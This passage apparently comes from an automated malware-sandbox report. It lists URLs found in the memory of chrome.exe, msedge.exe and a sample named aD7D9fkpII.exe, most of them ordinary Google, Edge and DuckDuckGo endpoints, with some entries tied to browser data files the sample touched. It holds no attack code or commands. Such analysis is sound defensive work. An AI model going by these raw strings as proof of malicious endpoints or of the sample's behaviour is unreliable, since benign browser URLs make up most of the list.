                  Source: chrome.exe, 0000000B.00000002.2324554616.00001E9000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324710834.00001E90006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322505965.00001E900001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2235760011.00001E90004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324679295.00001E90006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326039443.00001E90009EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2471030949.000008C400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.16.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: fa201b82-10e8-4a2b-8d09-ec16cd71c292.tmp.18.dr, 6af7d95f-d76a-45be-917e-a577a06ee000.tmp.18.drString found in binary or memory: https://clients2.googleusercontent.com
                  Source: chrome.exe, 0000000B.00000002.2325747912.00001E9000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                  Source: chrome.exe, 0000000B.00000002.2325747912.00001E9000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                  Source: chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                  Source: chrome.exe, 0000000B.00000002.2324602200.00001E9000678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                  Source: chrome.exe, 0000000B.00000002.2326295010.00001E9000AA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                  Source: chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                  Source: chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                  Source: manifest.json0.16.drString found in binary or memory: https://docs.google.com/
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                  Source: chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                  Source: chrome.exe, 0000000B.00000002.2326171667.00001E9000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                  Source: chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                  Source: chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                  Source: chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                  Source: chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                  Source: chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                  Source: chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328786741.00001E900112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                  Source: chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                  Source: chrome.exe, 0000000B.00000002.2326256167.00001E9000A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                  Source: chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultjb
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/ogl
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                  Source: chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328786741.00001E900112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                  Source: chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                  Source: chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default(
                  Source: chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionsCreate
                  Source: chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionshic
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-autopush.corp.google.com/
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                  Source: chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                  Source: chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                  Source: chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.c
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                  Source: chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.go
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-preprod.corp.google.com/
                  Source: manifest.json0.16.drString found in binary or memory: https://drive-staging.corp.google.com/
                  Source: chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                  Source: manifest.json0.16.drString found in binary or memory: https://drive.google.com/
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                  Source: chrome.exe, 0000000B.00000002.2327305685.00001E9000D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                  Source: chrome.exe, 0000000B.00000002.2327305685.00001E9000D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2/
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
                  Source: chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2d
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328786741.00001E900112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324679295.00001E90006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                  Source: aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                  Source: aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 000003.log6.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                  Source: 000003.log6.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                  Source: 000003.log6.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                  Source: 000003.log7.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                  Source: 000003.log6.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: HubApps Icons.16.dr, 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: 000003.log6.16.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                  Source: chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2274197468.00001E9001D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/#
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/&
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/-
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/0
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/7
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/:
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2274197468.00001E9001D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322559998.00001E9000044000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2472963054.000008C400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                  Source: chrome.exe, 0000000B.00000002.2324602200.00001E9000678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
